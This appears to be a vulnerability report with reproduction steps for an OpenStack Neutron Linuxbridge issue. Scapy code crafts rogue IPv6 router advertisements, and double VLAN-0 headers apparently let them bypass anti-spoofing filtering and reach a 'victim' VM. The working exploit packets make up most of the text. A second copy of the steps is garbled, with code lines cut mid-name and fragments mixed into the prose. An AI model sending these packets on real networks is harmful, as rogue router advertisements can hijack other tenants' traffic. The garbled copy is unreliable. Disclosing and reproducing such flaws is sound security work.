Some high level repro steps:
launch 2 ubuntu 20.04 vms on the same host (host using Neutron ML2 with Linuxbridge driver)
on the first VM (victim), run
~~~~~~~~~~
ip monitor
~~~~~~~~~~
on the second VM (attacker), run
~~~~~~~~~~
apt update && apt install -y scapy
scapy
~~~~~~~~~~
Send a normal router advertisement, it should be blocked:
~~~~~~~~~~
ra = Ether()
ra /= IPv6(dst='ff02::1')
ra /= ICMPv6ND_RA(chlim=64, prf='High', routerlifetime=1800)
ra /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr('eth0'))
ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64, validlifetime=1810, preferredlifetime=1800)
sendp(ra)
~~~~~~~~~~
Send a router advertisement with VLAN 0 headers, if it goes through this confirm the issue
~~~~~~~~~~
ra = Ether()/Dot1Q(vlan=0)/Dot1Q(vlan=0)
ra /= IPv6(dst='ff02::1')
ra /= ICMPv6ND_RA(chlim=64, prf='High', routerlifetime=1800)
ra /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr('eth0'))
ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64, validlifetime=1810, preferredlifetime=1800)
sendp(ra)
~~~~~~~~~~
Some high level repro steps:
launch 2 ubuntu 20.04 vms on the same host (host using Neutron ML2 with Linuxbridge driver)
on the first VM (victim), run
~~~~~~~~~~
ip monitor
~~~~~~~~~~
on the second VM (attacker), run
~~~~~~~~~~
apt update && apt install -y scapy
scapy
~~~~~~~~~~
Send a normal router advertisement, it should be blocked: RA(chlim= 64, prf='High', routerlifetime= 1800) LAddr(lladdr= get_if_ hwaddr( 'eth0') ) ixInfo( prefix= "2001:db8: 1::", prefixlen=64, validlifetime=1810, preferredlifeti me=1800)
~~~~~~~~~~
ra = Ether()
ra /= IPv6(dst='ff02::1')
ra /= ICMPv6ND_
ra /= ICMPv6NDOptSrcL
ra /= ICMPv6NDOptPref
sendp(ra)
~~~~~~~~~~
Send a router advertisement with VLAN 0 headers, if it goes through this confirm the issue /Dot1Q( vlan=0) /Dot1Q( vlan=0) RA(chlim= 64, prf='High', routerlifetime= 1800) LAddr(lladdr= get_if_ hwaddr( 'eth0') ) ixInfo( prefix= "2001:db8: 1::", prefixlen=64, validlifetime=1810, preferredlifeti me=1800)
~~~~~~~~~~
ra = Ether()
ra /= IPv6(dst='ff02::1')
ra /= ICMPv6ND_
ra /= ICMPv6NDOptSrcL
ra /= ICMPv6NDOptPref
sendp(ra)
~~~~~~~~~~
Please also check OVS, I haven't looked at it